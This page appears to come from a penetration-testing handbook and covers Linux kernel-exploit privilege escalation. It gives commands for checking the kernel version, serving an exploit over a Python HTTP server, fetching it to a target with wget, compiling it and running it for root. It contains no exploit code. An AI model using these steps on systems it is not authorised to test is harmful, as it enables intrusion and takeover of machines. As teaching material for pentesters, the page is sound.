handbook/tools/5.Machine/1.Linux/General/Exploitation/1.Privilege-Escalation/5.Kernel-Exploits.md

General

A kernel exploit is a type of attack that targets vulnerabilities in the kernel of an operating system, such as Linux. The kernel is the central component of an operating system that manages resources and provides access to hardware and software services. It is responsible for interacting with the system's hardware and providing the necessary resources to run programs and processes.

An attacker can exploit vulnerabilities in the kernel to gain unauthorized access to a system, escalate their privileges, or execute arbitrary code. This can allow the attacker to bypass security controls, compromise sensitive data, and take control of the system.

There are several ways an attacker might exploit vulnerabilities in the kernel of a Linux system. One way is by using a buffer overflow attack, which involves sending more data to a buffer than it can handle, leading to a crash or the execution of malicious code. Another way is by using a race condition, which involves manipulating the timing of system calls to exploit a vulnerability.

Kernel Exploits

Kernel level exploits exist for a variety of Linux kernel versions. A very well-known example is Dirty COW (CVE-2016-5195). These leverage vulnerabilities in the kernel to execute code with root privileges. It is very common to find systems that are vulnerable to kernel exploits. It can be hard to keep track of legacy systems, and they may be excluded from patching due to compatibility issues with certain services or applications.

• A quick way to identify exploits is to issue the command uname -a and search Google for the kernel version.

1. Check Kernel Version, OS Distribution & Version

uname -r             ---> Kernel Version
uname -a             ---> OS Version
cat /etc/*release    ---> Distribution Version

2. Download the exploit to the machine after finding one and compile it

# Attacking Machine
Download Exploit
python3 -m http.server

# Target Machine
wget http://IP/kernel_exploit.c
cc kernel_exploit.c -o kernel_expoit && chmod +x kernel_expoit
  '---> DEPEND ON THE KERNEL EXPLOIT, might need more arguments...
Edit/modify exploit if needed (Change password, username, salt, ...)

3. Run the exploit and become root!

./kernel_expoit

Although it looks simple, please remember that a failed kernel exploit can lead to a system crash. Make sure this potential outcome is acceptable within the scope of your penetration testing engagement before attempting a kernel exploit.

• Research sources:

  1. Based on your findings, you can use Google to search for an existing exploit code.
  2. Sources such as https://www.linuxkernelcves.com/cves can also be useful.
  3. Another alternative would be to use a script like LES (Linux Exploit Suggester) but remember that these tools can generate false positives (report a kernel vulnerability that does not affect the target system) or false negatives (not report any kernel vulnerabilities although the kernel is vulnerable).

• Hints/Notes:

  1. Being too specific about the kernel version might not be the best when searching for exploits on Google, Exploit-db, or searchsploit
  2. Be sure you understand how the exploit code works BEFORE you launch it.
  3. Some exploits may require further interaction once they are run. Read all comments and instructions provided with the exploit code.
  4. You can transfer the exploit code from your machine to the target system using the SimpleHTTPServer Python module and wget respectively.